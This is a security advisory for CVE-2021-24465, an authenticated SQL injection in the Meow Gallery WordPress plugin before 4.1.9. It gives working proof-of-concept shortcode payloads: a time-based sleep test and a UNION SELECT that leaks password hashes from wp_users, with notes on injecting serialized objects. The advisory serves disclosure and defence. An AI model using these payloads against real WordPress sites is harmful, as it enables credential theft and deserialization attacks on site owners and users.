Meow Gallery < 4.1.9 – Contributor+ SQL Injection | CVE 2021-24465

Description

The plugin does not sanitise, validate or escape the ids attribute of its gallery shortcode (available for users as low as Contributor) before using it in an SQL statement, leading to an authenticated SQL Injection issue. The injection also allows the returned values to be manipulated in a way that could lead to data disclosure and arbitrary objects to be deserialized.

Proof of Concept

Simple PoC to prove the SQLi: add the following shortcode in a page/post with a role as low as contributor, then preview/view it and note the 10s delay

[gallery layout="cascade" ids="1) AND (select*from(select(sleep(10)))a"]

-- Reporter PoC:

This SQL injection allows two things: 1) disclosure of arbitrary contents in SQL tables, and 2) deserialization of arbitrary objects.

To prepare for data disclosure, we first need to get serialized version of _wp_attachment_metadata. Of course if you are here for deserialization this can be replaced with serialization gadgets.

This is the JSON I used for this:

{"width":1,"height":1,"file":"a.png","sizes":{"medium":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"},"thumbnail":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"}},"image_meta":{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0","keywords":[]}}

b64 = eyJ3aWR0aCI6MSwiaGVpZ2h0IjoxLCJmaWxlIjoiYS5wbmciLCJzaXplcyI6eyJtZWRpdW0iOnsiZmlsZSI6ImEucG5nIiwid2lkdGgiOjEsImhlaWdodCI6MSwibWltZS10eXBlIjoiaW1hZ2UvcG5nIn0sInRodW1ibmFpbCI6eyJmaWxlIjoiYS5wbmciLCJ3aWR0aCI6MSwiaGVpZ2h0IjoxLCJtaW1lLXR5cGUiOiJpbWFnZS9wbmcifX0sImltYWdlX21ldGEiOnsiYXBlcnR1cmUiOiIwIiwiY3JlZGl0IjoiIiwiY2FtZXJhIjoiIiwiY2FwdGlvbiI6IiIsImNyZWF0ZWRfdGltZXN0YW1wIjoiMCIsImNvcHlyaWdodCI6IiIsImZvY2FsX2xlbmd0aCI6IjAiLCJpc28iOiIwIiwic2h1dHRlcl9zcGVlZCI6IjAiLCJ0aXRsZSI6IiIsIm9yaWVudGF0aW9uIjoiMCIsImtleXdvcmRzIjpbXX19

Which can be base64_encode(serialize(json_decode(PAYLOAD))) ed to get the serialized payload.

Shortcode payload for leaking user's password hashes:
[gallery layout="cascade" ids="1) UNION SELECT id,user_pass,FROM_BASE64('BASE64ED_PAYLOAD_SEE_ABOVE') FROM wp_users WHERE id IN (1,2,3,4"]


This should produce a HTML like (base64ed):
<div class="mgl-row mgl-layout-1-o" data-cascade-layout="o"><div class="mgl-box a"><figure class="mgl-item">
	<div class="mgl-icon">
		<div class="mgl-img-container">
												</div>
	</div>
		<figcaption class="mgl-caption">
			<p>LEAKED PASSWORD HASH/</p>
	</figcaption>
	</figure>
</div></div>